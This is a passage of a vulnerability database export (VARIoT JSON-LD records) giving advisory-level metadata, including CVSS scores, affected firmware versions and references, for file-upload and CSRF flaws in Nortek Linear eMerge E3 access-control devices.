          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Buffer error vulnerability in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0158

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow Unrestricted File Upload. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.

    Nortek Security & Control Linear eMerge E3-Series has a code issue vulnerability. An attacker could use this vulnerability to upload a file with an arbitrary extension to a path in the application's Web root directory and execute the file with Web server permissions

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0158",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7257",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7257",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34632",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158692",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7257",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7257",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34632",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-106",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158692",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow Unrestricted File Upload. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a code issue vulnerability. An attacker could use this vulnerability to upload a file with an arbitrary extension to a path in the application\u0027s Web root directory and execute the file with Web server permissions",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          }
        ],
        "trust": 2.25
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-158692",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7257",
            "trust": 3.9
          },
          {
            "db": "PACKETSTORM",
            "id": "155254",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47622",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "id": "VAR-201907-0158",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.510000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-434",
            "trust": 1.1
          },
          {
            "problemtype": "Unlimited uploads of dangerous types of files (CWE-434) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7257"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155254/linear-emerge-e3-1.00-06-arbitrary-file-upload-remote-root-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/47622"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          },
          {
            "date": "2019-07-02T19:15:11.227000",
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34632"
          },
          {
            "date": "2019-11-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158692"
          },
          {
            "date": "2024-03-07T07:23:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          },
          {
            "date": "2019-11-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          },
          {
            "date": "2022-10-14T01:32:10.637000",
            "db": "NVD",
            "id": "CVE-2019-7257"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerability in Unrestricted Upload of Dangerous Files on Series Devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006013"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "code problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-106"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0163

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow Cross-Site Request Forgery (CSRF). (DoS) It may be in a state. Nortek Security&Control Linear eMerge E3-Series is an access control device from Nortek Security&Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0163",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7262",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": true,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 6.8,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7262",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-158697",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7262",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7262",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-099",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158697",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
